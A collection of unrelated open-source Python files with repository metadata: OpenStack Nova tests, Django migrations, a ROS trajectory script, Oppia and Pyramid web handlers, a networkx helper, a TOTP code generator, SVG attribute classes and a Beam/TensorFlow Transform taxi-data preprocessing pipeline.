def test_injected_invalid(self):
# test with invalid b64 encoded content
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', 'seespotrun'),
]
self.assertRaises(exception.Base64Exception, self.compute.run_instance,
self.context, self.instance, injected_files=injected_files)
def test_reschedule(self):
# test that rescheduling is done with original encoded files
expected = [
('/a/b/c', base64.b64encode('foobarbaz')),
('/d/e/f', base64.b64encode('seespotrun')),
]
def _roe(context, instance, exc_info, requested_networks,
admin_password, injected_files, is_first_time, request_spec,
filter_properties, bdms=None, legacy_bdm_in_spec=False):
self.assertEqual(expected, injected_files)
return True
def spawn_explode(context, instance, image_meta, injected_files,
admin_password, nw_info, block_device_info):
# force reschedule logic to execute
raise test.TestingException(_("spawn error"))
self.stubs.Set(self.compute.driver, 'spawn', spawn_explode)
self.stubs.Set(self.compute, '_reschedule_or_error', _roe)
self.compute.run_instance(self.context, self.instance,
injected_files=expected)
class CheckConfigDriveTestCase(test.TestCase):
# NOTE(sirp): `TestCase` is far too heavyweight for this test, this should
# probably derive from a `test.FastTestCase` that omits DB and env
# handling
def setUp(self):
super(CheckConfigDriveTestCase, self).setUp()
self.compute_api = compute.API()
def _assertCheck(self, expected, config_drive):
self.assertEqual(expected,
self.compute_api._check_config_drive(config_drive))
def _assertInvalid(self, config_drive):
self.assertRaises(exception.ConfigDriveInvalidValue,
self.compute_api._check_config_drive,
config_drive)
def test_config_drive_false_values(self):
self._assertCheck('', None)
self._assertCheck('', '')
self._assertCheck('', 'False')
self._assertCheck('', 'f')
self._assertCheck('', '0')
def test_config_drive_true_values(self):
self._assertCheck(True, 'True')
self._assertCheck(True, 't')
self._assertCheck(True, '1')
def test_config_drive_bogus_values_raise(self):
self._assertInvalid('asd')
self._assertInvalid(uuidutils.generate_uuid())
class CheckRequestedImageTestCase(test.TestCase):
def setUp(self):
super(CheckRequestedImageTestCase, self).setUp()
self.compute_api = compute.API()
self.context = context.RequestContext(
'fake_user_id', 'fake_project_id')
self.instance_type = flavors.get_default_flavor()
self.instance_type['memory_mb'] = 64
self.instance_type['root_gb'] = 1
def test_no_image_specified(self):
self.compute_api._check_requested_image(self.context, None, {},
self.instance_type)
def test_image_status_must_be_active(self):
image = dict(id='123', status='foo')
self.assertRaises(exception.ImageNotActive,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['status'] = 'active'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_min_ram_check(self):
image = dict(id='123', status='active', min_ram='65')
self.assertRaises(exception.InstanceTypeMemoryTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['min_ram'] = '64'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_min_disk_check(self):
image = dict(id='123', status='active', min_disk='2')
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['min_disk'] = '1'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_image_too_large(self):
image = dict(id='123', status='active', size='1073741825')
self.assertRaises(exception.InstanceTypeDiskTooSmall,
self.compute_api._check_requested_image, self.context,
image['id'], image, self.instance_type)
image['size'] = '1073741824'
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_root_gb_zero_disables_size_check(self):
self.instance_type['root_gb'] = 0
image = dict(id='123', status='active', size='1073741825')
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
def test_root_gb_zero_disables_min_disk(self):
self.instance_type['root_gb'] = 0
image = dict(id='123', status='active', min_disk='2')
self.compute_api._check_requested_image(self.context, image['id'],
image, self.instance_type)
| {
"content_hash": "4342ea672479a941fcde98281bf11d16",
"timestamp": "",
"source": "github",
"line_count": 9496,
"max_line_length": 79,
"avg_line_length": 43.652801179443976,
"alnum_prop": 0.575996255973676,
"repo_name": "ntt-sic/nova",
"id": "a16f8c19ee1b1d00e136c70b9c74ed4add4e5027",
"size": "415380",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/compute/test_compute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13403264"
},
{
"name": "Shell",
"bytes": "17194"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bio', models.CharField(blank=True, max_length=500, null=True)),
('website', models.CharField(blank=True, max_length=255, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
]
| {
"content_hash": "c195f84ac98df5a1aab7dcb46e523f61",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 145,
"avg_line_length": 33.46153846153846,
"alnum_prop": 0.6333333333333333,
"repo_name": "julienawilson/news-project",
"id": "b894e9a1b1dc72210b1708b103abe2bae64b8634",
"size": "943",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "news_project/profiles/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "8482"
},
{
"name": "Python",
"bytes": "19006"
}
],
"symlink_target": ""
} |
import time
import roslib;
import rospy
import actionlib
from control_msgs.msg import *
from trajectory_msgs.msg import *
JOINT_NAMES = ['front_left_wheel_joint', 'back_left_wheel_joint', 'back_right_wheel_joint', 'front_right_wheel_joint']
Q1_ANGLE = 1.5708
Q0 = [0, 0, 0, 0]
Q1 = [Q1_ANGLE, Q1_ANGLE, Q1_ANGLE, Q1_ANGLE]
client = None
def move1():
g = FollowJointTrajectoryGoal()
g.trajectory = JointTrajectory()
g.trajectory.joint_names = JOINT_NAMES
print JOINT_NAMES
g.trajectory.points = [
JointTrajectoryPoint(positions=Q0, time_from_start=rospy.Duration(1.0)),
JointTrajectoryPoint(positions=Q1, time_from_start=rospy.Duration(2.0)),
JointTrajectoryPoint(positions=Q0, time_from_start=rospy.Duration(3.0))]
client.send_goal(g)
try:
client.wait_for_result()
except KeyboardInterrupt:
client.cancel_goal()
raise
def main():
global client
try:
rospy.init_node("test_move", anonymous=True, disable_signals=True)
client = actionlib.SimpleActionClient('follow_joint_trajectory', FollowJointTrajectoryAction)
print "Waiting for server..."
client.wait_for_server()
print "Connected to server"
move1()
except KeyboardInterrupt:
rospy.signal_shutdown("KeyboardInterrupt")
raise
if __name__ == '__main__': main()
| {
"content_hash": "697aab04c72c0510733768c9c23dd75e",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 118,
"avg_line_length": 29.145833333333332,
"alnum_prop": 0.6604717655468192,
"repo_name": "arennuit/vrep_ros_control_example",
"id": "cd00e2dad20d1ac777c8dc16419bdeefb61c00d0",
"size": "1421",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "action/test_move.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "58129"
},
{
"name": "C++",
"bytes": "223759"
},
{
"name": "Python",
"bytes": "1421"
}
],
"symlink_target": ""
} |
"""Oppia base constants and handlers."""
__author__ = 'Sean Lip'
import json
import logging
import sys
import traceback
import feconf
import jinja2
from models.exploration import Exploration
from models.state import State
import webapp2
from google.appengine.api import users
def require_user(handler):
"""Decorator that checks if a user is associated to the current session."""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in."""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
return handler(self, user, **kwargs)
return test_login
def require_editor(handler):
"""Decorator that checks if the user can edit the given entity."""
def test_editor(self, exploration_id, state_id=None, **kwargs):
"""Gets the user and exploration id if the user can edit it.
Args:
self: the handler instance
exploration_id: the exploration id
state_id: the state id, if it exists
**kwargs: any other arguments passed to the handler
Returns:
The user and exploration instance, if the user is authorized to edit
this exploration. Also, the state instance, if one is supplied.
Raises:
self.NotLoggedInException: if there is no current user.
self.UnauthorizedUserException: if the user exists but does not have
the right credentials.
"""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
exploration = Exploration.get(exploration_id)
if not exploration.is_editable_by(user):
raise self.UnauthorizedUserException(
'%s does not have the credentials to edit this exploration.',
user)
if not state_id:
return handler(self, user, exploration, **kwargs)
state = State.get(state_id, exploration)
return handler(self, user, exploration, state, **kwargs)
return test_editor
def require_admin(handler):
"""Decorator that checks if the current user is an admin."""
def test_admin(self, **kwargs):
"""Checks if the user is logged in and is an admin."""
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
if not users.is_current_user_admin():
raise self.UnauthorizedUserException(
'%s is not an admin of this application', user)
return handler(self, user, **kwargs)
return test_admin
class BaseHandler(webapp2.RequestHandler):
"""Base class for all Oppia handlers."""
@webapp2.cached_property
def jinja2_env(self):
return jinja2.Environment(
autoescape=True,
loader=jinja2.FileSystemLoader(feconf.TEMPLATE_DIR))
def __init__(self, request, response):
# Set self.request, self.response and self.app.
self.initialize(request, response)
# Initializes the return dict for the handlers.
self.values = {
'debug': feconf.DEBUG,
'allow_yaml_file_upload': feconf.ALLOW_YAML_FILE_UPLOAD,
}
user = users.get_current_user()
if user:
self.values['logout_url'] = (
users.create_logout_url(self.request.uri))
self.values['user'] = user.nickname()
self.values['is_admin'] = users.is_current_user_admin()
else:
self.values['login_url'] = users.create_login_url(self.request.uri)
def render_template(self, filename, values=None):
if values is None:
values = self.values
self.response.cache_control.no_cache = True
self.response.cache_control.must_revalidate = True
self.response.expires = 'Mon, 01 Jan 1990 00:00:00 GMT'
self.response.pragma = 'no-cache'
self.response.write(self.jinja2_env.get_template(
filename).render(**values))
def _render_exception(self, error_code, values):
assert error_code in [400, 401, 500]
values['code'] = error_code
# This checks if the response should be JSON or HTML.
if self.request.get('payload'):
self.response.write(json.dumps(values))
else:
self.values.update(values)
self.render_template('error.html')
def handle_exception(self, exception, debug_mode):
"""Overwrites the default exception handler."""
logging.info(''.join(traceback.format_exception(*sys.exc_info())))
logging.error('Exception raised: %s', exception)
if isinstance(exception, self.NotLoggedInException):
self.redirect(users.create_login_url(self.request.uri))
return
if isinstance(exception, self.UnauthorizedUserException):
self.error(401)
self._render_exception(401, {'error': str(exception)})
return
if isinstance(exception, self.InvalidInputException):
self.error(400)
self._render_exception(400, {'error': str(exception)})
return
if isinstance(exception, self.InternalErrorException):
self.error(500)
self._render_exception(500, {'error': str(exception)})
return
self.error(500)
self._render_exception(500, {'error': str(exception)})
class UnauthorizedUserException(Exception):
"""Error class for unauthorized access."""
class NotLoggedInException(Exception):
"""Error class for users that are not logged in (error code 401)."""
class InvalidInputException(Exception):
"""Error class for invalid input on the user's side (error code 400)."""
class InternalErrorException(Exception):
"""Error class for an internal server side error (error code 500)."""
| {
"content_hash": "dfa565fd5e4b0b68c12e20439609c01e",
"timestamp": "",
"source": "github",
"line_count": 175,
"max_line_length": 80,
"avg_line_length": 34.565714285714286,
"alnum_prop": 0.625227310299223,
"repo_name": "sunu/oppia-test",
"id": "1a9f00c1cfd4f60bf6de1ce1fa5d170f4b3c995b",
"size": "6647",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "controllers/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "7292"
},
{
"name": "JavaScript",
"bytes": "5995930"
},
{
"name": "Python",
"bytes": "202930"
},
{
"name": "Shell",
"bytes": "16798"
}
],
"symlink_target": ""
} |
import networkx as nx
import operator
class Properties:
"""
Some important properties of the graph.
Arguments:
graph - A networkx graph or digraph.
"""
def __init__(self, graph):
self.g = graph
def ConnectedComponents(self):
"""
Compute the connected components of the graph.
Returns:
a list containing lists of nodes in each connected components.
"""
gr = self.g
conn_comps = nx.connected_component_subgraphs(gr, copy=True)
return list(conn_comps)
def nodeInConnectedComponent(self, node):
"""
Place a node in a connected component of the graph.
Arguments:
node - the node whose connected component is desired.
Returns:
A connected subgraph of the original graph which contains the node.
"""
gr = self.g
neighhboringNodes = nx.node_connected_component(gr, node)
subgraph = nx.subgraph(gr, neighhboringNodes)
return subgraph
def centralNodes(self, nNodes, closeness=False, betweenness=False):
"""
Compute the most central nodes. It measure how important/central in the graph a node is.
We have three metrics for measuring centrality ---
Degree Centrality : The degree centrality for a node v is the fraction of nodes it is connected to.
This is the default measure.
Closeness Centrality : Closeness centrality of a node u is the reciprocal of the sum of the
shortest path distances from u to all n−1 other nodes.
(http://en.wikipedia.org/wiki/Centrality#Closeness_centrality)
Betweenness Centrality : Betweenness centrality of a node v is the sum of the fraction of all-pairs
shortest paths that pass through v.
(http://en.wikipedia.org/wiki/Betweenness_centrality)
Arguments:
nNodes - number of most central nodes to be retrieved.
closeness : If True, the closeness centrality is evaluated.
betweenness : If True, the betweenness centrality is evaluated.
Returns:
A list of most central nodes.
"""
gr = self.g
if (closeness == True):
centralityDict = nx.closeness_centrality(gr)
if (betweenness == True):
centralityDict = nx.betweenness_centrality(gr)
else:
centralityDict = nx.degree_centrality(gr)
sortedCentralityDict = sorted(centralityDict.iteritems(), key=operator.itemgetter(1), reverse=True)
central_nodes = []
i = 0
while (i < nNodes):
u,v = sortedCentralityDict[i]
central_nodes.append(u)
i += 1
return central_nodes
| {
"content_hash": "1715c9ad44a32eccdb1ca807e354cce9",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 102,
"avg_line_length": 21.62280701754386,
"alnum_prop": 0.7022312373225152,
"repo_name": "Jverma/TextGraphics",
"id": "2ee74f9c8fd36143539f79e39a3f344681d41d95",
"size": "2596",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TextGraphics/Analysis/properties.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24497"
}
],
"symlink_target": ""
} |
import hmac, base64, struct, hashlib, time, json, os
def get_hotp_token(secret, intervals_no):
"""This is where the magic happens."""
key = base64.b32decode(normalize(secret), True) # True is to fold lower into uppercase
msg = struct.pack(">Q", intervals_no)
h = bytearray(hmac.new(key, msg, hashlib.sha1).digest())
o = h[19] & 15
h = str((struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000)
return prefix0(h)
def get_totp_token(secret):
"""The TOTP token is just a HOTP token seeded with every 30 seconds."""
return get_hotp_token(secret, intervals_no=int(time.time())//30)
def normalize(key):
"""Normalizes secret by removing spaces and padding with = to a multiple of 8"""
k2 = key.strip().replace(' ','')
# k2 = k2.upper() # skipped b/c b32decode has a foldcase argument
if len(k2)%8 != 0:
k2 += '='*(8-len(k2)%8)
return k2
def prefix0(h):
"""Prefixes code with leading zeros if missing."""
if len(h) < 6:
h = '0'*(6-len(h)) + h
return h
def main():
rel = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with open(os.path.join(rel,'secrets.json'), 'r') as f:
secrets = json.load(f)
for label, key in sorted(list(secrets.items())):
print("{}:\t{}".format(label, get_totp_token(key)))
if __name__ == "__main__":
main()
| {
"content_hash": "f052282c3f72f0532ebefd8e58d304a4",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 87,
"avg_line_length": 30.069767441860463,
"alnum_prop": 0.6465583913379737,
"repo_name": "grahammitchell/google-authenticator",
"id": "69139b2ee50b7e492a3520ffe99369e29420d5a7",
"size": "1312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "google-authenticator.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1312"
}
],
"symlink_target": ""
} |
from RGT.XML.SVG.Attribs.basicSvgAttribute import BasicSvgAttribute
from types import StringType
class PositionAttributes(BasicSvgAttribute):
ATTRIBUTE_X = 'x'
ATTRIBUTE_Y = 'y'
def __init__(self):
BasicSvgAttribute.__init__(self)
def setX(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_X, data)
def setY(self, data):
if data is not None:
if type(data) is not StringType:
data = str(data)
self._setNodeAttribute(self.ATTRIBUTE_Y, data)
def getX(self):
node = self._getNodeAttribute(self.ATTRIBUTE_X)
if node is not None:
return node.nodeValue
return None
def getY(self):
node = self._getNodeAttribute(self.ATTRIBUTE_Y)
if node is not None:
return node.nodeValue
return None
| {
"content_hash": "74d44687e1029e985fcc223f814d51b7",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 67,
"avg_line_length": 27.405405405405407,
"alnum_prop": 0.5690335305719921,
"repo_name": "danrg/RGT-tool",
"id": "67dd94524bb51570e767ee519d1133811c4030c2",
"size": "1014",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/RGT/XML/SVG/Attribs/positionAttributes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "83200"
},
{
"name": "HTML",
"bytes": "93970"
},
{
"name": "JavaScript",
"bytes": "111380"
},
{
"name": "Python",
"bytes": "788710"
},
{
"name": "SQLPL",
"bytes": "722"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('studies', '0019_auto_20170723_1738'),
]
operations = [
migrations.AlterModelOptions(
name='study',
options={'ordering': ['name'], 'permissions': (('can_view_study', 'Can View Study'), ('can_create_study', 'Can Create Study'), ('can_edit_study', 'Can Edit Study'), ('can_remove_study', 'Can Remove Study'), ('can_activate_study', 'Can Activate Study'), ('can_deactivate_study', 'Can Deactivate Study'), ('can_pause_study', 'Can Pause Study'), ('can_resume_study', 'Can Resume Study'), ('can_approve_study', 'Can Approve Study'), ('can_submit_study', 'Can Submit Study'), ('can_retract_study', 'Can Retract Study'), ('can_resubmit_study', 'Can Resubmit Study'), ('can_edit_study_permissions', 'Can Edit Study Permissions'), ('can_view_study_permissions', 'Can View Study Permissions'), ('can_view_study_responses', 'Can View Study Responses'), ('can_view_study_video_responses', 'Can View Study Video Responses'), ('can_view_study_demographics', 'Can View Study Demographics'), ('can_archive_study', 'Can Archive Study'))},
),
]
| {
"content_hash": "871460fa71b17292f6c871dd573210bd",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 934,
"avg_line_length": 72.17647058823529,
"alnum_prop": 0.6658516707416463,
"repo_name": "pattisdr/lookit-api",
"id": "5164a3e83284b6088f756f76323f18b5a00c4116",
"size": "1300",
"binary": false,
"copies": "1",
"ref": "refs/heads/feature/read_the_docs",
"path": "studies/migrations/0020_auto_20170725_1654.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10578"
},
{
"name": "HTML",
"bytes": "181428"
},
{
"name": "Python",
"bytes": "439144"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
"""
Config module
This module defines the class for getting configuration options
:license: MIT, see LICENSE for more details
:copyright: (c) 2016 by NETHINKS GmbH, see AUTORS for more details
"""
import os
import configparser
class AppConfig(object):
def __init__(self, config_file=None):
# get directory name
basedir = os.path.dirname(os.path.abspath(__file__))
self.__filename_input = basedir + "/etc/app-default.conf"
self.__filename_output = basedir + "/output/app-config.conf"
if config_file is not None:
self.__filename_input = config_file
self.__config = configparser.ConfigParser()
self.__config.read(self.__filename_input)
def get_value(self, section_name, key, default_value):
# set default value
output = default_value
# get value from config
try:
output = self.__config.get(section_name, key)
except:
pass
# return value
return output
def get_value_boolean(self, section_name, key):
output = False
try:
output = self.__config.getboolean(section_name, key)
except:
pass
return output
def get_sections(self):
return self.__config.sections()
def get_keys(self, section):
return self.__config.options(section)
def set_value(self, section_name, key, value):
# set value in data structure
try:
self.__config[section_name]
except:
self.__config[section_name] = {}
self.__config[section_name][key] = value
# save configuration file
with open(self.__filename_output, 'w') as configfile:
self.__config.write(configfile)
| {
"content_hash": "caebb9a87fe3288e680d094faa4e4a35",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 68,
"avg_line_length": 29.366666666666667,
"alnum_prop": 0.6027241770715096,
"repo_name": "NETHINKS/opennms-docker-env",
"id": "1fc005cedf7cacfa0cc4741b62f003760b87b417",
"size": "1762",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/container_generator/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1428"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "64686"
},
{
"name": "Shell",
"bytes": "77405"
},
{
"name": "Smarty",
"bytes": "10117"
}
],
"symlink_target": ""
} |
"""Preprocessor applying tf.transform to the chicago_taxi data."""
# pytype: skip-file
from __future__ import absolute_import, division, print_function
import argparse
import os
import tensorflow as tf
import tensorflow_transform as transform
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.coders import example_proto_coder
from tensorflow_transform.tf_metadata import dataset_metadata, dataset_schema
import apache_beam as beam
from apache_beam.io.gcp.bigquery import ReadFromBigQuery
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.testing.load_tests.load_test_metrics_utils import (
MeasureTime, MetricsReader)
from trainer import taxi
def _fill_in_missing(x):
"""Replace missing values in a SparseTensor.
Fills in missing values of `x` with '' or 0, and converts to a dense tensor.
Args:
x: A `SparseTensor` of rank 2. Its dense shape should have size at most 1
in the second dimension.
Returns:
A rank 1 tensor where missing values of `x` have been filled in.
"""
default_value = '' if x.dtype == tf.string else 0
return tf.squeeze(
tf.sparse.to_dense(
tf.SparseTensor(x.indices, x.values, [x.dense_shape[0], 1]),
default_value),
axis=1)
def transform_data(
input_handle,
outfile_prefix,
working_dir,
schema_file,
transform_dir=None,
max_rows=None,
pipeline_args=None,
publish_to_bq=False,
project=None,
metrics_table=None,
metrics_dataset=None):
"""The main tf.transform method which analyzes and transforms data.
Args:
input_handle: BigQuery table name to process specified as DATASET.TABLE or
path to csv file with input data.
outfile_prefix: Filename prefix for emitted transformed examples
working_dir: Directory in which transformed examples and transform function
will be emitted.
schema_file: An file path that contains a text-serialized TensorFlow
metadata schema of the input data.
transform_dir: Directory in which the transform output is located. If
provided, this will load the transform_fn from disk instead of computing
it over the data. Hint: this is useful for transforming eval data.
max_rows: Number of rows to query from BigQuery
pipeline_args: additional DataflowRunner or DirectRunner args passed to the
beam pipeline.
"""
def preprocessing_fn(inputs):
"""tf.transform's callback function for preprocessing inputs.
Args:
inputs: map from feature keys to raw not-yet-transformed features.
Returns:
Map from string feature key to transformed feature operations.
"""
outputs = {}
for key in taxi.DENSE_FLOAT_FEATURE_KEYS:
# Preserve this feature as a dense float, setting nan's to the mean.
outputs[taxi.transformed_name(key)] = transform.scale_to_z_score(
_fill_in_missing(inputs[key]))
for key in taxi.VOCAB_FEATURE_KEYS:
# Build a vocabulary for this feature.
outputs[taxi.transformed_name(
key)] = transform.compute_and_apply_vocabulary(
_fill_in_missing(inputs[key]),
top_k=taxi.VOCAB_SIZE,
num_oov_buckets=taxi.OOV_SIZE)
for key in taxi.BUCKET_FEATURE_KEYS:
outputs[taxi.transformed_name(key)] = transform.bucketize(
_fill_in_missing(inputs[key]), taxi.FEATURE_BUCKET_COUNT)
for key in taxi.CATEGORICAL_FEATURE_KEYS:
outputs[taxi.transformed_name(key)] = _fill_in_missing(inputs[key])
# Was this passenger a big tipper?
taxi_fare = _fill_in_missing(inputs[taxi.FARE_KEY])
tips = _fill_in_missing(inputs[taxi.LABEL_KEY])
outputs[taxi.transformed_name(taxi.LABEL_KEY)] = tf.where(
tf.is_nan(taxi_fare),
tf.cast(tf.zeros_like(taxi_fare), tf.int64),
# Test if the tip was > 20% of the fare.
tf.cast(
tf.greater(tips, tf.multiply(taxi_fare, tf.constant(0.2))),
tf.int64))
return outputs
namespace = metrics_table
metrics_monitor = None
if publish_to_bq:
metrics_monitor = MetricsReader(
publish_to_bq=publish_to_bq,
project_name=project,
bq_table=metrics_table,
bq_dataset=metrics_dataset,
namespace=namespace,
filters=MetricsFilter().with_namespace(namespace))
schema = taxi.read_schema(schema_file)
raw_feature_spec = taxi.get_raw_feature_spec(schema)
raw_schema = dataset_schema.from_feature_spec(raw_feature_spec)
raw_data_metadata = dataset_metadata.DatasetMetadata(raw_schema)
pipeline = beam.Pipeline(argv=pipeline_args)
with tft_beam.Context(temp_dir=working_dir):
query = taxi.make_sql(input_handle, max_rows, for_eval=False)
raw_data = (
pipeline
| 'ReadBigQuery' >> ReadFromBigQuery(
query=query, project=project, use_standard_sql=True)
| 'Measure time: start' >> beam.ParDo(MeasureTime(namespace)))
decode_transform = beam.Map(
taxi.clean_raw_data_dict, raw_feature_spec=raw_feature_spec)
if transform_dir is None:
decoded_data = raw_data | 'DecodeForAnalyze' >> decode_transform
transform_fn = ((decoded_data, raw_data_metadata) |
('Analyze' >> tft_beam.AnalyzeDataset(preprocessing_fn)))
_ = (
transform_fn |
('WriteTransformFn' >> tft_beam.WriteTransformFn(working_dir)))
else:
transform_fn = pipeline | tft_beam.ReadTransformFn(transform_dir)
# Shuffling the data before materialization will improve Training
# effectiveness downstream. Here we shuffle the raw_data (as opposed to
# decoded data) since it has a compact representation.
shuffled_data = raw_data | 'RandomizeData' >> beam.transforms.Reshuffle()
decoded_data = shuffled_data | 'DecodeForTransform' >> decode_transform
(transformed_data,
transformed_metadata) = (((decoded_data, raw_data_metadata), transform_fn)
| 'Transform' >> tft_beam.TransformDataset())
coder = example_proto_coder.ExampleProtoCoder(transformed_metadata.schema)
_ = (
transformed_data
| 'SerializeExamples' >> beam.Map(coder.encode)
| 'Measure time: end' >> beam.ParDo(MeasureTime(namespace))
| 'WriteExamples' >> beam.io.WriteToTFRecord(
os.path.join(working_dir, outfile_prefix), file_name_suffix='.gz'))
result = pipeline.run()
result.wait_until_finish()
if metrics_monitor:
metrics_monitor.publish_metrics(result)
def main():
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
help=('Input BigQuery table to process specified as: '
'DATASET.TABLE'))
parser.add_argument(
'--schema_file', help='File holding the schema for the input data')
parser.add_argument(
'--output_dir',
help=(
'Directory in which transformed examples and function '
'will be emitted.'))
parser.add_argument(
'--outfile_prefix',
help='Filename prefix for emitted transformed examples')
parser.add_argument(
'--transform_dir',
required=False,
default=None,
help='Directory in which the transform output is located')
parser.add_argument(
'--max_rows',
help='Number of rows to query from BigQuery',
default=None,
type=int)
parser.add_argument(
'--publish_to_big_query',
help='Whether to publish to BQ',
default=None,
type=bool)
parser.add_argument(
'--metrics_dataset', help='BQ dataset', default=None, type=str)
parser.add_argument(
'--metrics_table', help='BQ table', default=None, type=str)
parser.add_argument(
'--metric_reporting_project',
help='BQ table project',
default=None,
type=str)
known_args, pipeline_args = parser.parse_known_args()
transform_data(
input_handle=known_args.input,
outfile_prefix=known_args.outfile_prefix,
working_dir=known_args.output_dir,
schema_file=known_args.schema_file,
transform_dir=known_args.transform_dir,
max_rows=known_args.max_rows,
pipeline_args=pipeline_args,
publish_to_bq=known_args.publish_to_big_query,
metrics_dataset=known_args.metrics_dataset,
metrics_table=known_args.metrics_table,
project=known_args.metric_reporting_project)
if __name__ == '__main__':
main()
| {
"content_hash": "2eec2dea7aaa13c459dd8495eb4ad1a1",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 79,
"avg_line_length": 35.024896265560166,
"alnum_prop": 0.6762231963037555,
"repo_name": "iemejia/incubator-beam",
"id": "057cb5863e2f67471094535ef4947780d42f4318",
"size": "9039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdks/python/apache_beam/testing/benchmarks/chicago_taxi/preprocess.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groovy",
"bytes": "22216"
},
{
"name": "Java",
"bytes": "9687045"
},
{
"name": "Protocol Buffer",
"bytes": "1407"
},
{
"name": "Shell",
"bytes": "10104"
}
],
"symlink_target": ""
} |
"""Fichier contenant le type Assiette."""
from .conteneur_nourriture import ConteneurNourriture
class Assiette(ConteneurNourriture):
"""Type d'objet: assiette
"""
nom_type = "assiette"
def __init__(self, cle=""):
"""Constructeur de l'objet"""
ConteneurNourriture.__init__(self, cle)
self.poids_max = 12
| {
"content_hash": "40ae4bf077aa8d14d707dfde3f9501e3",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 53,
"avg_line_length": 22.8125,
"alnum_prop": 0.6054794520547945,
"repo_name": "stormi/tsunami",
"id": "ce724e1b6998c54ad39758f7fa5cda02eff1c282",
"size": "1930",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/primaires/objet/types/assiette.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7188300"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
from pyramid.httpexceptions import HTTPClientError, HTTPInternalServerError
from pyramid.renderers import render_to_response
from pyramid.security import NO_PERMISSION_REQUIRED
def error_view(context, request):
data = {
'exc': context,
}
error_template = '/error.html'
response = render_to_response(error_template, data, request)
response.status_int = context.code
return response
def forbidden_view(context, request):
"""Handle ``403 Forbidden`` responses.
If a user is logged in, a 403 indicates the user doesn't have the
permissions necessary to view the resource. In this case, show an
error page.
If no user is logged in, redirect to the login page (unless signups
are enabled via the ``accounts.allow_signup`` setting, in which case
redirect to the signup page).
NOTE: This usage of 403s is dictated by Pyramid's auth machinery. It
uses 403s to indicate any unauthorized access to a protected resource,
whether by an anonymous/unauthenticated user or by an authenticated user
that doesn't have the appropriate permissions. Generally speaking, we
shouldn't raise 403s ourselves (a 400, 401, or 404 can be used instead,
depending on the circumstances).
"""
return error_view(context, request)
def exc_view(context, request):
"""Convert uncaught exception to ``500 Internal Server Error``.
